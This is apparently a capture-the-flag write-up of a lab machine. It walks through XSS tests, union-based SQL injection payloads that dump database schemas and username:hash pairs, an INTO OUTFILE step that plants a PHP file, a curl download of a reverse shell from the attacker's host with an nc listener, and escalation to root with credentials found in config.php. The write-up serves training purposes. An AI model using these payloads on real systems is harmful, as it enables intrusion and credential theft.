ENUMERATION
NMAP
Port 80
Port 4566
Port 8080
I enumerate Port 80:
First Attack Vectors
The index page of this web it's a form to qualify for something called September UHC, let's try to inject code SQL,XSS,HTML and more.
XSS
Payload: <script>alert("SS")</script>
It's Vulnerable to XSS and HTML Injection, but i can't do anything
SQLI
BurpSuite
Payload: ' order by 10000-- - == NO WORK
Payload: ' union select 1-- - == NO WORK
Country Field
Let's try to do this payloads with other field from request.
Payload: ' union select 1-- - == WORKS!!!!!
Let's go to enumerate Things.
Database
Payload: ' union select database()-- -
Version
Payload: ' union select @@version-- -
All DataBases
Payload: ' union select schema_name from information_schema.schemata
Tables Registration Database
Payload: ' union select table_name from information_schema.tables where table_schema="registration"-- -
Table name is the same than DataBase Name
Columns
Payload: ' union select column_name from information_schema.columns where table_schema="registration" and table_name="registration"-- -
Users and Passwords
Payload: ' union select group_concat(username,0x3a,userhash) from registration-- -
This users are my users...
RCE
Payload: ' union select "" into outfile "/var/www/html/rce.php"-- -
Works!!
Reverse Shell
I create in my Kali Machine a php script to gain reverse shell.
I open http server wirth python3: python3 -m http.server
In victim RCE: curl -o shell.php 10.10.14.33:8000/shell.php
Now i put rlwrap nc -lnvp 1212
I access to: http://10.10.11.116/shell.php
I HAVE SHELL!!
user.txt
Docker Container
Im in docker container but i found a credentials in /var/www/html/config.php
SSH DON'T WORK
su root its working
DONE :)
Thanks